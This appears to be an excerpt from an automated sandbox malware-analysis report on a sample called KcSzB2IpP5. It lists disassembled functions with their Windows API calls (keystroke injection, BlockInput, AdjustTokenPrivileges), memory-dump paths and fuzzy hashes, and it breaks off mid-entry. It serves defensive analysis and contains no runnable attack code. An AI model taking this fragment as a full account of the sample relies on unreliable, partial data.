Instruction Fuzzy Hash: 94D0C9B481115DEECB94CB90DCC8DD9B37CBF04305F104196F106A2000DB34954A8F24

Function 0048CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: 169d8da32fba1ae95276c6f4a3b3008550ef8116df30e54164325564d51c84b4
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 0B023C71E002199BDF14DFA9C8C06AEBBF1FF48314F25856AE919E7380D734AA41CB94

Function 0046CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 004B0C40
p#S, xrefs: 0046CF7F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#S
API String ID: 0-2746333027
Opcode ID: e38329b1c4e93238ea344a5bce4d2347ae808fd168961dceb8c952edec8f3b80
Instruction ID: 555335f4a35a5c69ad822a2257657ab8f8a23fc3d6ee0b79d27da884e65884fc
Opcode Fuzzy Hash: e38329b1c4e93238ea344a5bce4d2347ae808fd168961dceb8c952edec8f3b80
Instruction Fuzzy Hash: 16326F70900218DBCF14DF95C885AFEB7B5BF05308F14405BE846AB392E779AD46CB6A

Function 004D68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 004D6918
FindClose.KERNEL32(00000000), ref: 004D6961

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c88d9424ac116a53f14a18322ea0995fd93c5c132f0bdab7686a8a593225b7f4
Instruction ID: c9fc39383ba667db260b2331d36bf9736d5a1110292fab14398cc321c43f66cb
Opcode Fuzzy Hash: c88d9424ac116a53f14a18322ea0995fd93c5c132f0bdab7686a8a593225b7f4
Instruction Fuzzy Hash: E911B1716042009FC710CF69C4D4A26BBE1EF85328F05C6AEE4698F3A2C734EC05CB95

Function 004D37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,004E4891,?,?,00000035,?), ref: 004D37E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,004E4891,?,?,00000035,?), ref: 004D37F4

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 22654a85df67133e32b6a6ae20af3595c00f1401473d7c126a05370900362e82
Instruction ID: e3de299bddd32849cd1d07180b76f0494ccba50d9c66d92c00099bcc0353c295
Opcode Fuzzy Hash: 22654a85df67133e32b6a6ae20af3595c00f1401473d7c126a05370900362e82
Instruction Fuzzy Hash: 25F0E5B06052292AE72017668C8DFEB7AAEEFC5765F000177F509E2291DA609D04C6B9

Function 004CB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 004CB25D
keybd_event.USER32(?,7707C0D0,?,00000000), ref: 004CB270

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 7413c9a243b16088824b622bb75539e314c6e55129a702e0aa9380e720f3eec7
Instruction ID: 28d128c7a93515f4c60324cb3b52901d9b62c068bd357cac01392d939821423a
Opcode Fuzzy Hash: 7413c9a243b16088824b622bb75539e314c6e55129a702e0aa9380e720f3eec7
Instruction Fuzzy Hash: A5F01D7580424EABDB059FA0C806BBE7BB4FF04305F00845AF955A5191C3799615DF98

Function 004C10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004C11FC), ref: 004C10D4
CloseHandle.KERNEL32(?,?,004C11FC), ref: 004C10E9

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 5ce8c910b5ed8f4c28796b048285929b460b93e2882836f63f6f70465adfa429
Instruction ID: 46b052d256cfc55607fbf5b866ed74946246285a9fecf73a58ad3b2fb6bd574b
Opcode Fuzzy Hash: 5ce8c910b5ed8f4c28796b048285929b460b93e2882836f63f6f70465adfa429
Instruction Fuzzy Hash: 6EE04F32008600AEE7252B52FC05EB377A9EF04310B10C82EF4A6804B1DB626CA0DB58

Function 0049676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00496766,?,?,00000008,?,?,0049FEFE,00000000), ref: 00496998

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 82eec5c93e2f32f9908ea2cc3b8ecd5b3ae8d44168513f9865a3320a9020ed81
Instruction ID: 37f2ff5082d3f1331f77f27418ddc27bbffd835a7c8a732d0aa76218533fc54c
Opcode Fuzzy Hash: 82eec5c93e2f32f9908ea2cc3b8ecd5b3ae8d44168513f9865a3320a9020ed81
Instruction Fuzzy Hash: C0B14D715106089FDB15CF28C48AB657FE0FF45364F26866AE899CF3A1C339D992CB44

Function 0047B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 004B851F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 43bd34c6b798ab2673eec0c56644b19db5bebf54d585ddce1d2721591d8b5a70
Instruction ID: 2f825eb7342773b98e1a31e24ac6d9f3a1fb8eb81a181897c50e14331be66e2a
Opcode Fuzzy Hash: 43bd34c6b798ab2673eec0c56644b19db5bebf54d585ddce1d2721591d8b5a70
Instruction Fuzzy Hash: DB124F759002299BDB14CF58C8807EEB7F5FF48710F14819AE849EB255EB389E81CBA5

Function 004DEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 004DEABD

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: b9cdc6742d5a4706fc709b5438c1d1ff3dcece10e93ab8326156ef48c45ec372
Instruction ID: 27dee3a871fe09fff46bc864b3069cdb27aab162868dc600580e7e268881a3b4
Opcode Fuzzy Hash: b9cdc6742d5a4706fc709b5438c1d1ff3dcece10e93ab8326156ef48c45ec372
Instruction Fuzzy Hash: B4E012312002059FD710EF5AD454D9AB7D9AF58764F00841BFC45CB351D674A8418B95

Function 004809D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,004803EE), ref: 004809DA

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: bf23e478b1c0566f59c194202b37b578a27c798a0ed83243552cc66a7242c71f
Instruction ID: df3bbf38ce7d8aec1c197c216dd90328ddd43d308583007b14b4f9b22ea20cb2
Opcode Fuzzy Hash: bf23e478b1c0566f59c194202b37b578a27c798a0ed83243552cc66a7242c71f
Instruction Fuzzy Hash:

Function 0048781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0048798B

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 32195661807a2be501b3697dd779c8753b95dbd30ba10fdf2aa0841543dca121
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: AD5179A160C60557EB38B66988BD7BF27899B02384F380D0FD886D7382D61DDE42D35E

Function 004D2046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&S, xrefs: 004D2053

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID: 0&S
API String ID: 0-3935748072
Opcode ID: 64db453d040b1d80dd47741f3d3987d5aa2e6ccabd3fe36257d8bafed272a244
Instruction ID: 45851291a22302391ccbc8db58ad13a63c433388e78b73a28ec42d9f22ef68e1
Opcode Fuzzy Hash: 64db453d040b1d80dd47741f3d3987d5aa2e6ccabd3fe36257d8bafed272a244
Instruction Fuzzy Hash: 5F21D8326206118BD728CE79C92367E73E5A764310F14862FE4A7C33D0DE79A904D754

Function 00496DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b333d358abfa2ec8c4037392559ff8832c5981f88bd3b492d7edbb42efd69a11
Instruction ID: 39eabe2ea65d3afb115f0794d1f5cb9c13f5f0839fc500c4d38079ce30df9c53
Opcode Fuzzy Hash: b333d358abfa2ec8c4037392559ff8832c5981f88bd3b492d7edbb42efd69a11
Instruction Fuzzy Hash: A6322522D79F014DDB239634CC2633A6649AFB73D5F15D737E81AB5AA6EB28C4835200

Function 0047CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e588aa661b8781837b8f460181ddf21684867f707638ca5f28cf6139d16e75
Instruction ID: d84fe96de1d47543129d1ae291e54ea514c1cd6f52794df6a5844027c577d370
Opcode Fuzzy Hash: 06e588aa661b8781837b8f460181ddf21684867f707638ca5f28cf6139d16e75
Instruction Fuzzy Hash: DB32F131A041058FDF39CE29C4D06FE7BA1EB45300F28856BD49A9B391D63CDD86DB69

Function 00467920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39ccc5d830360a130df398ae1cfde806fe40e7929edc6e90984bd3a34de57791
Instruction ID: ac4d7d28c73bd8f5962515072e061eb01b948ccb731e667aee832b5eb7dc26e9
Opcode Fuzzy Hash: 39ccc5d830360a130df398ae1cfde806fe40e7929edc6e90984bd3a34de57791
Instruction Fuzzy Hash: 9122E2B0A00609DFDF14CFA5C941AAEB3F1FF55308F20452AE816A7291E73DAD15CB5A

Function 004691C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7d1fb251549f607dc08eeca43cdc8608f5af67e84e77c597d561deb0a7b8e58
Instruction ID: b377bad43fc2fbc6af3f179e6b362c02bd1b6659d3b53b992e89fe77247511f0
Opcode Fuzzy Hash: e7d1fb251549f607dc08eeca43cdc8608f5af67e84e77c597d561deb0a7b8e58
Instruction Fuzzy Hash: 890207B0E00205EBDB00DF55D881AAEB7B5FF55304F10856AE816DB390EB39EE15CB99

Function 00481C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 0c74c10f97b275775325a436981a6f4678dc6c51074f582138c89b4b9097928a
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: EB91A8721080A34ADB29563E853413FFFE55A523A131A0F9FD4F2CA2E1FE18D956D724

Function 004819B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 0888a39b17900aa9eb9a631866f0a7a3dac827f8af31f6fa46bcc46e3264963d
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: FF91B5722090E34ADB2D527A847403FFFE94A923A131A0B9FD4F2CA2E1FD18D556D724

Function 00487A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78db4aa47107c00042b57f2a0335decbb74ec4ea1f6c7b96ba4eb50c62e9e3b6
Instruction ID: 880528633df5af8bca4252f37d543ffe2784341b16a0d33acec8c00035bf1512
Opcode Fuzzy Hash: 78db4aa47107c00042b57f2a0335decbb74ec4ea1f6c7b96ba4eb50c62e9e3b6
Instruction Fuzzy Hash: DE61597160870956DA38B92888B5BBF7396DF51748F740D1FE842DB382D61DEE82831E

Function 00481706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 29d63a8fdd0d255979f2c3830f991adb05e201b96ab419c26d1cc04216ca5afd
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 1F81A8725080A309DB2D6239857543FFFE55A923A131A0F9FD4F2CB2E1EE18C556E724

Function 01027718 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1334121532.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1024000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 8b3af41c8f1c1c682db25bf0c6d67294d535105e8de23762fd3275c6c3565171
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: E541C171D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB80

Function 01027608 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1334121532.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1024000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 54385c02dd061bf498a34f2c5c0e9ceb1ea13893b6a23ee97fdf4c25edc38557
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 7B019D78A00209EFCB94DF98C5909AEF7F5FB98310F208699E849A7301D730AE41DB80

Function 010275A8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1334121532.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1024000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
